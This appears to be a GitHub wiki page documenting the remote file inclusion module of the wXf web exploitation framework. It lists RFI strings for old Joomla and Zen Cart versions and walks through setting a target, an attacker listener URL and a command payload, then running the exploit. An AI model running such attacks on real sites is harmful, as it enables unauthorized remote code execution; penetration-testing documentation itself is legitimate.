forked from forced-request/wXf
-
Notifications
You must be signed in to change notification settings - Fork 0
exploit rfi php all php rfi
cktricky edited this page Jul 26, 2011
·
5 revisions
Ken Johnson (CKTRICKY)
Allows you to pull RFI attack strings out of the database. You can choose an RFI string and send off the request.
COOKIE true Example: uniquecookie=cookievalue
PROXYA false Proxy IP Address
PROXYP false Proxy Port Number
RFI true Enter the RFI by name
RURL http://www.example.com/test.php true Target address
THROTTLE 0 false Specify a number, after x requests we pause
COOKIES -- If you have a cookie or cookies that you'd like to add to the request (whether GET or POST, doesn't matter), go ahead and set them here like so:
SINGLE COOKIE
set COOKIES ASPSESSIONID=1234;
MULTI COOKIE
set COOKIES ASPSESSIONID=1234; ASP.NET_SessionId=5678;
RFI -- Name of the RFI you'd like to use.
wXf exploit(all_php_rfi)//> show rfi
RFI List
========
Name Description Platform Language
---- ----------- -------- --------
joomla_1 Joomla 1.5.0 Beta Release joomla PHP
joomla_2 Joomla 1.0.8 joomla PHP
joomla_3 Joomla 1.0.11, 1.0.12, 1.0.13, 1.0.14 joomla PHP
zencart_1 Zen Cart Web Shopping Cart 1.2.7, 1.1.2 d, 1.3.0.2 zencart PHP
wXf exploit(all_php_rfi)//> set RFI joomla_1
I'd like to exploit a vulnerable Joomla server (version 1.0.8). My IP is 192.168.1.120
and I'd like to listen on port 31337
. The victim site is www.example.com
.
wXf //> use exploit/rfi/php/all_php_rfi
wXf exploit(all_php_rfi)//> set RFI joomla_2
-{+}- RFI => joomla_2
wXf exploit(all_php_rfi)//> set PAYLOAD payload/rfi/php/cmd_single
-{+}- PAYLOAD => payload/rfi/php/cmd_single
wXf exploit(all_php_rfi)//> set RURL http://www.example.com/joomla
-{+}- RURL => http://www.example.com/joomla
wXf exploit(all_php_rfi)//> set LURL http://192.168.1.120:31337
-{+}- LURL => http://192.168.1.120:31337
wXf exploit(all_php_rfi)//> exploit